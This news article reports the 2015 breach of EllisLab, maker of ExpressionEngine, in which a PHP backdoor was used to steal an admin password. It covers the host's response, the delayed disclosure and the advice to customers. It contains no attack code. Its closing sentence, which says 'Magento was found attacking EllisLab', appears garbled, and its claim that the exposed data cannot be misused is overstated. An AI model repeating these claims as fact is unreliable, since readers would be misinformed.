A major software developer, EllisLab, was informed by their web host that there was a password security breach and (after a while) they decided to pass that warning on to customers. The creators of the popular CMS platform ExpressionEngine announced on May 1, 2015 that hackers had targeted the company, gaining access to customer data which may include their address, email, phone number and passwords. EllisLab’s Super Admin password was actually stolen on March 24, 2015 via a popular PHP backdoor script that allowed the hacker to get into the server with no authentication. It’s a common hacker tactic, but EllisLab chose to announce the hack in a post-mortem approach, over one month after the hack took place.
According to the company, the hackers only enjoyed three hours of uninterrupted access before the web host (Nexcess) got wind of the breach. The web host says they were alerted of “malicious activity” after numerous attempts for root access in the server failed. They “immediately shut down access at the firewall level,” and got in touch with EllisLab. However, that kind of fast action on the web host’s end wasn’t mimicked when it came to the customers. It takes a while to create a damage control strategy, and many companies want to gauge exactly how severe the damage may be before facing a customer/media firestorm.
A Practiced Approach
EllisLab says, “We began dissecting the server logs to retrace their steps and learn how they gained access. We went through all our files to remove what they added. We also audited ExpressionEngine, since we would need to release a patch before disclosing the attack if the breach was due to an exploit.” The good news is the hackers didn’t actually get into the company database, but EllisLab combed through every potential vulnerability so as not to assume anything. Hackers can sometimes gain very sensitive data and hold onto it before acting (and sometimes they never make use of it).
Fortunately, it doesn’t seem like any financial information (such as saved payment data) was taken by the hackers. Member profile information was the “juiciest” information stolen, and EllisLab says there’s a chance parts of credit card information was accessed (like the last four numbers from invoices) as well as data on support tickets issued in February and March. However, this is all information that, while sensitive, cannot be used for malicious means.
What Customers Can Do
The company is urging its customers to change their passwords on the site and passwords that may have been created for support tickets. “Being the direct target of a criminal attack has been a learning experience and we hope to use what we’ve learned to help our customers,” EllisLab wrote in a post. “We have discovered some server changes that you can make to help secure your site and limit the damage that a bad actor can do. And even though ExpressionEngine was not exploited in this attack, our audit led to further security enhancements in our latest 2.10.1 release which you can download now.”
EllisLab has also added overall security advice to their site to help their customers better safeguard their data. This isn’t the first time the web host Nexcess found and quickly acted on an exploit. In 2014, Magento was found attacking EllisLab, which ultimately led to credit card information being copied and accessed during checkout.